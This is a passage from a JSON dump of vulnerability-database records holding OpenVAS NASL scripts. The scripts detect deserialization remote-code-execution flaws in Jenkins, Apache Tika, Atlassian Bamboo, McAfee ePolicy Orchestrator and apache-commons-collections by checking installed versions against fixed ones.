USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872446\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:14 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 
24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XKRLBXFPKTEBV4JI66GC2KQDE3TLZMYR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:17:20", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "cvss3": {}, "published": "2017-01-30T00:00:00", "type": "openvas", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310108062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone 
Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108062\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution 
vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! 
version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:27", "description": "The host is installed with Apache Tika Server\n and is prone to arbitrary Java code execution vulnerability.", "cvss3": {}, "published": "2018-06-20T00:00:00", "type": "openvas", "title": "Apache Tika Server Java Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6809"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813537", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813537", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tika Server Java Code Execution Vulnerability\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tika\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813537\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2016-6809\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-20 17:03:55 +0530 (Wed, 20 Jun 2018)\");\n script_name(\"Apache Tika Server Java Code Execution Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Apache Tika Server\n and is prone to arbitrary Java code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to Apache Tika Server\n invoking JMatIO to do native deserialization.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary Java code for serialized objects embedded in\n MATLAB files.\");\n\n script_tag(name:\"affected\", value:\"Apache Tika Server from versions 1.6 to 1.13\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Tika Server 1.14 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_xref(name:\"URL\", value:\"https://lists.apache.org/thread.html/93618b15cdf3b38fa1f0bfc0c8c7cf384607e552935bd3db2e322e07@%3Cdev.tika.apache.org%3E\");\n script_xref(name:\"URL\", value:\"https://tika.apache.org\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_tika_server_detect.nasl\");\n script_mandatory_keys(\"Apache/Tika/Server/Installed\");\n script_require_ports(\"Services/www\", 9998, 80);\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!tPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tPort, exit_no_version:TRUE)) exit(0);\ntVer = infos['version'];\ntPath = infos['location'];\n\nif(version_in_range(version:tVer, test_version: \"1.6\", test_version2: \"1.13\"))\n{\n report = report_fixed_ver(installed_version:tVer, fixed_version:\"1.14\", install_path:tPath);\n security_message(data:report, port:tPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872442", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# 
Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872442\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:08 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZE7XYOLIPAJFIIPWZPAVZYEAOAT6LHIJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:30", "description": "The host is installed with Atlassian Bamboo\n and is prone to remote code execution vulnerability.", "cvss3": {}, "published": "2016-02-19T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Remote Code Execution Vulnerability Feb16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8360"], "modified": "2018-11-21T00:00:00", "id": "OPENVAS:1361412562310807275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807275", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_remote_code_exec_vuln.nasl 12455 2018-11-21 09:17:27Z cfischer $\n#\n# Atlassian Bamboo Remote Code Execution Vulnerability Feb16\n#\n# Authors:\n# Tushar Khelge <ktushar@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU 
General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807275\");\n script_version(\"$Revision: 12455 $\");\n script_cve_id(\"CVE-2015-8360\");\n script_bugtraq_id(83111);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 10:17:27 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-19 10:03:11 +0530 (Fri, 19 Feb 2016)\");\n script_name(\"Atlassian Bamboo Remote Code Execution Vulnerability Feb16\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Atlassian Bamboo\n and is prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in a resource\n that deserialised arbitrary user input without restriction.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary java code.\");\n\n script_tag(name:\"affected\", value:\"Atlassian Bamboo 2.3.1 through 5.9.9\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 5.9.9 or later.\");\n\n 
script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-17101\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_mandatory_keys(\"AtlassianBamboo/Installed\");\n script_xref(name:\"URL\", value:\"https://www.atlassian.com/software/bamboo\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!bambooPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!bambooVer = get_app_version(cpe:CPE, port:bambooPort)){\n exit(0);\n}\n\nif(version_in_range(version:bambooVer, test_version:\"2.3.1\", test_version2:\"5.9.8\"))\n{\n report = report_fixed_ver(installed_version:bambooVer, fixed_version:\"5.9.9\");\n security_message(data:report, port:bambooPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:22", "description": "This host is installed with McAfee ePolicy\n Orchestrator and is prone to an arbitrary code execution vulnerability.", "cvss3": {}, "published": "2016-09-01T00:00:00", "type": "openvas", "title": "McAfee ePolicy Orchestrator Arbitrary Code Execution Vulnerability Sep16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8765"], "modified": "2018-11-15T00:00:00", "id": "OPENVAS:1361412562310809026", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809026", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mcafee_epolicy_orchestrator_arbitrary_code_exec_vuln_sep16.nasl 12359 2018-11-15 08:13:22Z cfischer $\n#\n# McAfee ePolicy Orchestrator Arbitrary Code Execution Vulnerability Sep16\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# 
Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mcafee:epolicy_orchestrator\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809026\");\n script_version(\"$Revision: 12359 $\");\n script_cve_id(\"CVE-2015-8765\");\n script_bugtraq_id(85696);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 09:13:22 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-09-01 10:20:57 +0530 (Thu, 01 Sep 2016)\");\n script_name(\"McAfee ePolicy Orchestrator Arbitrary Code Execution Vulnerability Sep16\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mcafee_epolicy_orchestrator_detect.nasl\");\n script_mandatory_keys(\"mcafee_ePO/installed\");\n script_require_ports(\"Services/www\", 8443);\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/576313\");\n script_xref(name:\"URL\", value:\"http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx\");\n\n 
script_tag(name:\"summary\", value:\"This host is installed with McAfee ePolicy\n Orchestrator and is prone to an arbitrary code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an insecure deserialization of data\n in apache commons collections.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers\n to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"McAfee ePolicy Orchestrator version 4.6.x through\n 4.6.9, 5.0.x, 5.1.x before 5.1.3 Hotfix 1106041 and 5.3.x before 5.3.1 Hotfix 1106041\");\n\n script_tag(name:\"solution\", value:\"Apply the hotfix 5.1.3 Hotfix 1106041 and\n 5.3.1 Hotfix 1106041 as mentioned in the reference link.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!mcaPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!mcaVer = get_app_version(cpe:CPE, port:mcaPort)){\n exit(0);\n}\n\nif(version_in_range(version:mcaVer, test_version:\"4.6.0\", test_version2:\"4.6.9\") ||\n version_in_range(version:mcaVer, test_version:\"5.0.0\", test_version2:\"5.1.3\") ||\n version_in_range(version:mcaVer, test_version:\"5.3.0\", test_version2:\"5.3.1\")){\n report = report_fixed_ver(installed_version:mcaVer, fixed_version:\"Apply the appropriate Hotfix\");\n security_message(data:report, port:mcaPort);\n}\n exit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:09", "description": "Mageia Linux Local Security Checks mgasa-2016-0137", "cvss3": {}, "published": "2016-05-09T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0137", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8103"], "modified": 
"2019-03-14T00:00:00", "id": "OPENVAS:1361412562310131309", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131309", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0137.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131309\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-05-09 14:18:11 +0300 (Mon, 09 May 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0137\");\n script_tag(name:\"insight\", value:\"Updated apache-commons-collections packages fix security vulnerability: Due to an issue with serialization, Java applications can be vulnerable to malicious remote code execution when the apache-commons-collections library is on the classpath (CVE-2015-8103).\");\n script_tag(name:\"solution\", value:\"Update the affected packages 
to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0137.html\");\n script_cve_id(\"CVE-2015-8103\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0137\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"apache-commons-collections\", rpm:\"apache-commons-collections~3.2.2~1.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:17", "description": "Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "openvas", "title": "Atlassian Bamboo Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6576"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310113012", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113012", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_atlassian_bamboo_rce_vuln1.nasl 
11863 2018-10-12 09:42:02Z mmartin $\n#\n# Atlassian Bamboo Remote Code Execution\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113012\");\n script_version(\"$Revision: 11863 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-11 10:01:18 +0200 (Wed, 11 Oct 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2015-6576\");\n\n script_name(\"Atlassian Bamboo Remote Code Execution\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_atlassian_bamboo_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n 
script_mandatory_keys(\"AtlassianBamboo/Installed\");\n\n script_tag(name:\"summary\", value:\"Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.\");\n script_tag(name:\"vuldetect\", value:\"Checks if the vulnerable version is present on the host.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow the attacker to execute arbitrary Java code on the host and possibly gain control over it.\");\n script_tag(name:\"affected\", value:\"Atlassian Bamboo versions 2.2 through 5.8.4 and 5.9.x before 5.9.7\");\n script_tag(name:\"solution\", value:\"Update to version 5.8.5 or version 5.9.7 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://jira.atlassian.com/browse/BAM-16439\");\n script_xref(name:\"URL\", value:\"https://confluence.atlassian.com/bamboo/bamboo-security-advisory-2015-10-21-785452575.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:atlassian:bamboo\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( !port = get_app_port( cpe: CPE ) ) {\n exit( 0 );\n}\n\nif( !version = get_app_version( cpe: CPE, port: port ) ) {\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"2.2\", test_version2: \"5.8.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.8.5\" );\n security_message( port: port, data: report );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"5.9.0\", test_version2: \"5.9.6\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.9.7\" );\n security_message( port: port, data: report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": 